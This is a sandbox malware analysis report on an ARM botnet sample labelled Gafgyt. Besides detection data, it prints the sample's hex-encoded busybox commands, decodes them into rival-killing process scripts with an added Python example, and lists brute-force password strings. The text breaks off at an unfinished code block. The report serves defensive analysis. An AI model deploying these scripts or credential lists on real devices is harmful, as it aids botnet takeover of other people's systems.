
Linux Analysis Report
arm6.elf

Overview

General Information

Sample name:arm6.elf
Analysis ID:1654498
MD5:bc88feeea1f6c44afbc38de1c724ad2b
SHA1:3f3af6aa2386bad9a0c8710c984fc6259095ae82
SHA256:3e858e55adcfa66c0c46eade15e62cd53010bd8790de2cd88cdf2367598737c2
Tags:elf, user-abuse_ch

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654498
Start date and time:2025-04-02 11:47:26 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/arm6.elf
PID:5413
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • arm6.elf (PID: 5413, Parent: 5335, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
    • arm6.elf New Fork (PID: 5415, Parent: 5413)
  • cleanup
No yara matches
No Suricata rule has matched


AV Detection

Source: arm6.elf Virustotal: Detection: 42%
Source: arm6.elf ReversingLabs: Detection: 41%
Source: /tmp/arm6.elf (PID: 5415) Socket: 127.0.0.1:22448 (a loopback-only bind; bots of this family commonly use such a socket as a single-instance lock, and no listener on an external interface is reported anywhere in this analysis)
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Note: daisy.ubuntu.com is the Ubuntu Error Tracker endpoint that the distribution's crash reporter (apport/whoopsie) contacts after a core dump. The memory strings below record the forked child (PID 5415) dying with "qemu: uncaught target signal 11 (Segmentation fault) - core dumped", so this lookup is most plausibly the analysis VM reporting that crash rather than the sample resolving a C2 host; it is the only network activity captured in this run.
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount
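The 'busybox' strings above are not BusyBox being bundled; they are the sample assembling two shell scripts byte by byte with `/bin/busybox echo -ne`, which is how a bot writes helper scripts on a device where BusyBox is the only echo that understands \x escapes. Decoded, the `kmount` fragments form a loop over /proc/mounts that finds anything mounted on a /proc/<pid> path (a bind mount over /proc/<pid> is the usual way to hide a process from ps), kills that pid and unmounts it. The `swan` fragments form a loop over every /proc/<pid>/maps that SIGKILLs any process whose maps contain no line mentioning /lib/, /lib64/ or .so, a crude test for statically linked binaries, which is how competing IoT bots are typically built. The block below is an added example, not code from the sample, from BusyBox or from Joe Sandbox: it decodes the fragments copied from the strings listed above and models both loops on embedded input. The /proc/mounts content and the "real ARM" maps listing are constructed; the other maps listing is the 355-byte dropped file shown later in this report.

```python
"""Rebuild the two shell scripts arm6.elf assembles through BusyBox and model
what each one does. Added example, not code from the sample or Joe Sandbox:
STRINGS_DUMP is copied from the 'busybox' strings in the report, MAPS_FROM_REPORT
is the 355-byte dropped file's preview, the other inputs are constructed."""
import re

STRINGS_DUMP = r'''
/bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
/bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
/bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
/bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
/bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
/bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
/bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
/bin/busybox echo -ne "\x6e\x74\x73" >> kmount
/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
/bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
/bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
/bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
/bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
/bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
/bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
/bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
/bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
sh kmount
'''

# One fragment per line; ">" truncates the target file, ">>" appends to it.
FRAGMENT_RE = re.compile(r'^/bin/busybox echo -ne "((?:\\x[0-9a-fA-F]{2})+)" (>>?) (\S+)$')


def rebuild_dropped_scripts(dump: str) -> dict[str, str]:
    """Replay the echo fragments in order; returns {filename: script text}."""
    files: dict[str, str] = {}
    for raw in dump.splitlines():
        m = FRAGMENT_RE.match(raw.strip())
        if not m:
            continue  # e.g. the bare "sh kmount" invocation string
        payload, redirect, target = m.groups()
        chunk = bytes.fromhex(payload.replace("\\x", "")).decode("ascii")
        files[target] = chunk if redirect == ">" else files.get(target, "") + chunk
    return files


SCRIPTS = rebuild_dropped_scripts(STRINGS_DUMP)


def kmount_targets(mounts_text: str) -> list[tuple[str, str]]:
    """Model of kmount: for each /proc/mounts line whose mount point (field 2,
    with the \\040 escape for spaces undone) matches /proc/<digit>..., the
    script runs `kill -9` on the path remainder and unmounts it. Bind-mounting
    over /proc/<pid> hides a process from ps; this un-hides and kills rivals.
    Returns (argument handed to kill -9, mount point) pairs."""
    hits = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        mount_point = fields[1].replace("\\040", " ")
        if re.match(r"/proc/[0-9]", mount_point):  # shell pattern /proc/[0-9]*
            hits.append((mount_point[len("/proc/"):], mount_point))
    return hits


def swan_marks_suspicious(maps_text: str) -> bool:
    """Model of swan for one readable /proc/<pid>/maps: suspicious=true until a
    line mentions /lib/, /lib64/ or .so; anything still suspicious gets SIGKILL.
    So every process with no shared library mapped qualifies: statically linked
    binaries, and (an empty maps never clears the flag) kernel threads too."""
    for line in maps_text.splitlines():
        if "/lib/" in line or "/lib64/" in line or ".so" in line:
            return False
    return True


MAPS_FROM_REPORT = """\
8000-22000 r-xp 00000000 fd:00 531567 /tmp/arm6.elf
2a000-2b000 rw-p 0001a000 fd:00 531567 /tmp/arm6.elf
2b000-32000 rw-p 00000000 00:00 0
ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
ff7ef000-ff7f0000 ---p 00000000 00:00 0
ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]
"""
# Constructed: the same binary on real ARM hardware, without qemu-arm's host libm.
MAPS_ON_REAL_ARM = """\
8000-22000 r-xp 00000000 1f:02 1234 /tmp/arm6.elf
2a000-2b000 rw-p 0001a000 1f:02 1234 /tmp/arm6.elf
"""
# Constructed /proc/mounts: a tmpfs bind-mounted over /proc/4242 hides PID 4242.
MOUNTS_SAMPLE = """\
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/root / ext4 rw,relatime 0 0
tmpfs /proc/4242 tmpfs rw,relatime 0 0
/dev/sda1 /mnt/usb\\040stick vfat rw 0 0
"""

if __name__ == "__main__":
    for name, body in SCRIPTS.items():
        print(f"--- {name} ---\n{body}\n")
    print("kmount kills/unmounts:", kmount_targets(MOUNTS_SAMPLE))
    print("swan kills the sample under qemu:", swan_marks_suspicious(MAPS_FROM_REPORT))
    print("swan kills the sample on real ARM:", swan_marks_suspicious(MAPS_ON_REAL_ARM))
```

Two details of the model are worth keeping in mind. Under qemu-arm the sample's own maps (the dropped file) contains the host's libm, so swan spares it in the sandbox; on real ARM hardware a static copy of this binary has no .so mapped and would itself satisfy the kill condition. And kmount trusts the mount-point string from /proc/mounts, so a mount on /proc/1234/anything yields `kill -9 1234/anything`, which simply fails.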
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/arm6.elf (PID: 5413) File opened: /proc/<pid>/cmdline for pids 1-27, 110-129, 230-249, 800, 802, 803, 914, 917, 1588, 1906, 3095, 3771, 5397 and 5398
Source: /tmp/arm6.elf (PID: 5413) File opened: /proc/<pid>/fd for pids 1, 800, 802, 803, 914, 917, 1588, 1906, 3095, 3771, 5397 and 5398
Source: /tmp/arm6.elf (PID: 5413) File opened: /proc/<pid>/maps for pids 1, 5397 and 5398
Source: /tmp/arm6.elf (PID: 5413) Queries kernel information via 'uname'
Note: the sample is an ARM executable that the x64 analysis host runs through qemu-arm user-mode emulation (binfmt_misc), as the /usr/bin/qemu-arm and /etc/qemu-binfmt/arm strings below show. The qemu-related strings therefore belong to the emulator process wrapping the sample, and "uncaught target signal 11 (Segmentation fault) - core dumped" from PID 5415 means the forked child crashed under emulation rather than running to completion, so the behaviour recorded in this report may be incomplete.
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmp Binary or memory string: /tmp/qemu-open.KzIBIw
Source: arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: vmware
Source: arm6.elf, 5413.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmp, arm6.elf, 5415.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm6.elf, 5413.1.00007f122803a000.00007f1228041000.rw-.sdmp, arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: qemu-arm
Source: arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5413.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmp, arm6.elf, 5415.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmp, arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmp, arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.KzIBIw:u}
Source: arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5413.1.00007f122803a000.00007f1228041000.rw-.sdmp, arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
MITRE ATT&CK matrix: techniques matched by this analysis, with the number of signatures behind each
Credential Access:    OS Credential Dumping (1), Brute Force (1)
Discovery:            Security Software Discovery (11)
Command and Control:  Non-Application Layer Protocol (1), Application Layer Protocol (1)
All other cells of the matrix as rendered (Gather Victim Identity Information, Credentials, Acquire Infrastructure, Domains, Valid Accounts, Default Accounts, Windows Management Instrumentation, Scheduled Task/Job, Path Interception, Boot or Logon Initialization Scripts, Direct Volume Access, Rootkit, Application Window Discovery, Remote Services, Remote Desktop Protocol, Data from Local System, Data from Removable Media, Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Abuse Accessibility Features, Network Denial of Service) are unmatched placeholders.
No configs have been found
Behavior graph (ID 1654498, sample arm6.elf, start date 02/04/2025, architecture LINUX, score 48): arm6.elf is started and in turn starts a second arm6.elf process; the graph's only DNS/IP node is daisy.ubuntu.com and its only signature node is "Multi AV Scanner detection for submitted file".
Source    Detection  Scanner        Label
arm6.elf  42%        Virustotal
arm6.elf  42%        ReversingLabs  Linux.Backdoor.Gafgyt
No Antivirus matches


Name              IP             Active  Malicious  Antivirus Detection  Reputation
daisy.ubuntu.com  162.213.35.24  true    false                           high
    No contacted IP infos
    No context
Context for daisy.ubuntu.com (other samples in the same corpus that resolved this name during analysis):
Associated Sample Name / URL  Detection  Threat Name  Resolved IP
arm5.elf                      malicious  Unknown      162.213.35.24
efea6.elf                     malicious  Unknown      162.213.35.25
xd.powerpc-440fp.elf          malicious  Mirai        162.213.35.24
xd.m68k.elf                   malicious  Mirai        162.213.35.25
xd.ppc.elf                    malicious  Mirai        162.213.35.25
xd.i686.elf                   malicious  Mirai        162.213.35.24
xd.arm6.elf                   malicious  Mirai        162.213.35.24
xd.arc.elf                    malicious  Mirai        162.213.35.24
mpsl.elf                      malicious  Unknown      162.213.35.24
sh4.elf                       malicious  Unknown      162.213.35.24
Read this table with care: daisy.ubuntu.com belongs to Ubuntu's error-reporting service, so a shared lookup of it says these samples were analysed on the same Ubuntu-based system, not that they share command-and-control infrastructure.
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
Preview:/tmp/arm6.elf. (13 printable characters plus one non-printable byte rendered as '.', i.e. the sample's own path followed by a single terminator byte, the same 14 bytes that the process's /proc/<pid>/cmdline holds for the command line "/tmp/arm6.elf"; the three 14-byte dropped files in this report all carry this identical content and hash)
    Process:/tmp/arm6.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):355
    Entropy (8bit):3.8407297606496944
    Encrypted:false
    SSDEEP:6:M6gceFXNH/VU8VbsceFXNNNVFT/V/3VVyAb/rVmsVot/VOArB/VH:39eGEbZejvVVIAbyl
    MD5:0772518832BB9A604910FCF92DD8E1C3
    SHA1:AF9863566C65B1043EF496C81973E51C0D4E082C
    SHA-256:15F78D0A578CA27C40C789DACEE4907132DAC4A308E9DC188D2858D5D00869B3
    SHA-512:BF3D79AC8F57EB566F074B1C4A04CACE54920BF195919DD2C0FE931E0881DB90EFEE05FD21EA127F29A9918161357F94E2D5BC8DD7179487D1B1BBCB22C50A71
    Malicious:false
    Reputation:low
Preview (a /proc/<pid>/maps listing of the emulated sample itself; the '.' separators in the original preview stand for newlines):
8000-22000 r-xp 00000000 fd:00 531567 /tmp/arm6.elf
2a000-2b000 rw-p 0001a000 fd:00 531567 /tmp/arm6.elf
2b000-32000 rw-p 00000000 00:00 0
ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
ff7ef000-ff7f0000 ---p 00000000 00:00 0
ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm6.elf.
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm6.elf.
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):6.149673700278677
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:arm6.elf
    File size:107'324 bytes
    MD5:bc88feeea1f6c44afbc38de1c724ad2b
    SHA1:3f3af6aa2386bad9a0c8710c984fc6259095ae82
    SHA256:3e858e55adcfa66c0c46eade15e62cd53010bd8790de2cd88cdf2367598737c2
    SHA512:d28f65fe643e06950b2930d81f3fb6c03bfdac56cfcbf38a35ca009b947a6a08864af20bce32b9f382ef747cab70bdea7c68539fa612203fc1a7ab7a99ca9f1b
    SSDEEP:3072:lwyIxMYZtAjVXtzULUYnN8tZdSzcrrFmulElrrhCadM:lwyIxMYZtY9HYKo+Fm0ElPh2
    TLSH:A3A30999B8919B66C5D406BFFE1F528D33231BF8E2DB3207DD18AB2077CA51A092F541
    File Content Preview:.ELF..............(.....l...4...4.......4. ...(.........T...T...T.......................................................................XH...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x816c
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:4
    Section Header Offset:106804
    Section Header Size:40
    Number of Section Headers:13
    Header String Table Index:12
Name         Type        Address  Offset   Size     EntSize  Flags  Flags Description  Link  Info  Align
             NULL        0x0      0x0      0x0      0x0      0x0                       0     0     0
.init        PROGBITS    0x80b4   0xb4     0x14     0x0      0x6    AX                 0     0     1
.text        PROGBITS    0x80c8   0xc8     0x16fdc  0x0      0x6    AX                 0     0     4
.fini        PROGBITS    0x1f0a4  0x170a4  0x14     0x0      0x6    AX                 0     0     1
.rodata      PROGBITS    0x1f0b8  0x170b8  0x289c   0x0      0x2    A                  0     0     4
.ARM.exidx   ARM_EXIDX   0x21954  0x19954  0xc8     0x0      0x82   AL                 2     0     4
.eh_frame    PROGBITS    0x2a000  0x1a000  0x4      0x0      0x3    WA                 0     0     4
.init_array  INIT_ARRAY  0x2a004  0x1a004  0x4      0x0      0x3    WA                 0     0     4
.fini_array  FINI_ARRAY  0x2a008  0x1a008  0x4      0x0      0x3    WA                 0     0     4
.got         PROGBITS    0x2a010  0x1a010  0x28     0x4      0x3    WA                 0     0     4
.data        PROGBITS    0x2a038  0x1a038  0x98     0x0      0x3    WA                 0     0     4
.bss         NOBITS      0x2a0d0  0x1a0d0  0x4788   0x0      0x3    WA                 0     0     8
.shstrtab    STRTAB      0x0      0x1a0d0  0x62     0x0      0x0                       0     0     1
Type     Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
DYNAMIC  0x19954  0x21954          0x21954           0xc8       0xc8         4.3297   0x4    R                  0x4                       .ARM.exidx
LOAD     0x0      0x8000           0x8000            0x19a1c    0x19a1c      6.2105   0x5    R E                0x8000                    .init .text .fini .rodata .ARM.exidx
LOAD     0x1a000  0x2a000          0x2a000           0xd0       0x4858       3.5836   0x6    RW                 0x8000                    .eh_frame .init_array .fini_array .got .data .bss
DYNAMIC  0x0      0x0              0x0               0x0        0x0          0.0000   0x7    RWE                0x4
Note: the report prints the first and last entries as DYNAMIC, but neither has the content of a dynamic-linking segment. The first covers exactly the .ARM.exidx section with read-only flags, which is the shape of the ARM exception-index segment, and the last is an all-zero segment whose only payload is its RWE flag set, which is the shape of a GNU_STACK entry requesting an executable stack. No program interpreter and no .interp, .dynamic or .dynsym section appears anywhere in these tables, so despite the "dynamically linked" wording in the file-type line the binary carries no loader dependency and no shared library to resolve, i.e. it behaves as a statically linked executable.
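To check what the program-header table above actually establishes, here is an added example (not code from the sample, from Joe Sandbox or from any ELF library) that rebuilds the four entries from the numbers in the table into a minimal ELF32 image and parses them back the way a triage script would parse the real file. The p_type values are an assumption: the report prints the first and last entries as DYNAMIC, but an R-only segment spanning exactly .ARM.exidx is what PT_ARM_EXIDX looks like and an all-zero segment carrying only RWE flags is what PT_GNU_STACK looks like, and the example encodes them that way.

```python
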